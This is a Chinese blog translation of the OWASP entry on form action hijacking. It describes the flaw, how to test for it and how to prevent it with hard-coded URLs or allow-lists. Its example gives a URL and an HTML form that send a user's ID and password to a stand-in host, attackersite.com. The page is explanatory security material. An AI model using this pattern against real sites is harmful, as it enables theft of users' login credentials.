tinytracer

  • 实践
    • CTF
    • 项目实践
  • 技术
    • C++
    • 逆向与汇编
    • 区块链安全
  • 探索
    • OWASP汉化
    • SQL
    • Kali
TinyTracer
In solitude, where we were at least alone.
  1. 首页
  2. 探索
  3. OWASP汉化
  4. 正文

(OWASP个人汉化)攻击系列大全:表单行为劫持

2018年4月22日 4039点热度 0人点赞 0条评论

最新版本 (mm/dd/yy): 09/12/2017

翻译自Form action hijacking

概览

表单行为劫持允许攻击者通过参数指定表单的动作URL。攻击者可以构造一个URL来修改表单的动作URL以指向攻击者的服务器。表单的内容,包括跨站请求令牌,用户输入的参数值,和其他所有的内容将通过被劫持的URL被传送到攻击者。

如何测试表单行为劫持漏洞

检查传递给表单操作的参数值。 参见下面的例子。

如何防止表单操作劫持漏洞

对表单操作网址进行硬编码或使用允许的网址的白名单。

攻击示例

以下网址会生成一个表单,并将“url”参数设置为来自操作网址。 提交表单时,ID和密码将发送到攻击者的网站。
URL:
https://vulnerablehost.com/?url=https://attackersite.com
源码

<form name="form1" id="form1" method="post" action="https://attackersite.com">
    <input type="text" name="id" value="user name">
    <input type="password" name="pass" value="password">
    <input type="submit" name="submit" value="Submit">
</form>

参考

  • 常见的弱点枚举 - CWE-20:输入验证不正确
  • PortSwigger:表单行为劫持(反射型)
  • PortSwigger:表单行为劫持(存储型)
标签: 表单行为劫持
最后更新:2018年4月22日

Chernobyl

这个人很懒,什么都没留下

点赞
< 上一篇

文章评论

razz evil exclaim smile redface biggrin eek confused idea lol mad twisted rolleyes wink cool arrow neutral cry mrgreen drooling persevering
取消回复

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据。

COPYRIGHT © 2021 tinytracer.com. ALL RIGHTS RESERVED.

Theme Kratos Made By Seaton Jiang